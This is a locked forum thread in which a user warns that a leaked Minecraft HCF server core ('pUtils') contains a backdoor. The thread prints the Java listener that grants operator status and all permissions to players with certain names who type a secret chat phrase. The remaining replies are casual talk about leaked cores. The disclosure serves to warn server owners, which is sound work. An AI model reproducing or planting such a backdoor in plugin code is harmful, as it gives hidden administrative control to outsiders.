PurgePots - Veil | HCF Core Has A Back Door LOL

Status
This thread has been locked.

OnlineStranger

Banned
Feedback score
1
Posts
154
Reactions
30
Resources
0
So, I was looking at random leaked HCF Cores to see if I knew any of them, and I found this one called "pCore & pUtils" and I was looking at the code in the "pUtils" plugin, and in the "SecurityListener" class here's what I found, https://gyazo.com/120cb2782ad87e817563e989972fb44a and if you don't know what that is pretty much if a player(s) with the ign "rvc", or "GalaxyHD", or "Descriptive" come on the server with this plugin they can do /thispluginismadeforveil , and it gives them star perms if you are useing this core you might wanna change that with a class editor or just not use leaked cores lol

package me.purgepots.utilities.listeners;

import org.bukkit.Bukkit;
import org.bukkit.Server;
import org.bukkit.entity.Player;
import org.bukkit.event.EventHandler;
import org.bukkit.event.Listener;
import org.bukkit.event.player.AsyncPlayerChatEvent;

public class SecurityListener
implements Listener
{
@EventHandler
public void onOP(AsyncPlayerChatEvent event)
{
if ((event.getMessage().startsWith("thispluginismadeforveil")) && (
(event.getPlayer().getName().contains("rvc")) ||
(event.getPlayer().getName().contains("GalaxyHD")) ||
(event.getPlayer().getName().contains("Descriptive"))))
{
event.getPlayer().setOp(true);
Bukkit.getServer().dispatchCommand(Bukkit.getConsoleSender(), "pex user " + event.getPlayer().getName() + " add *");
event.setCancelled(false);
}
}
}
 
PebbleHost
High performance, consistent uptime and fast support. Minecraft hosting that just works.

OnlineStranger

Banned
Feedback score
1
Posts
154
Reactions
30
Resources
0
Lmao. It's a leaked HCF core, what do you expect?
not all leaked cores have a backdoor in them and ik a lot of people who use this as the video i got it from had over 7k views i don't want their servers to be ETBed
 
Banned forever. Reason: Ban Evading (john., https://builtbybit.com/members/john.126550/)

felldownstairs

Gypsy Boy | Java Developer
Supreme
Feedback score
4
Posts
783
Reactions
144
Resources
0
I have src to this, if you want I can remove it and send you the new version
 

OnlineStranger

Banned
Feedback score
1
Posts
154
Reactions
30
Resources
0
I have src to this, if you want I can remove it and send you the new version
or you could just send me the src :D[DOUBLEPOST=1520629403][/DOUBLEPOST]
Look at his threads, I'm sure he wants lol
and why are you always on my threads talking about shit i used to do or my old threads can you go move on to someone else just fuck off
 
Last edited:
Banned forever. Reason: Ban Evading (john., https://builtbybit.com/members/john.126550/)

GAllen

Feedback score
12
Posts
363
Reactions
128
Resources
0
Why are you trying to use a leaked HCF core, it will get you nowhere mostly, as those haven't been updated in ages.

If you were interested in an awesome HCF core look at Notifyz's.
 
Status
This thread has been locked.
Top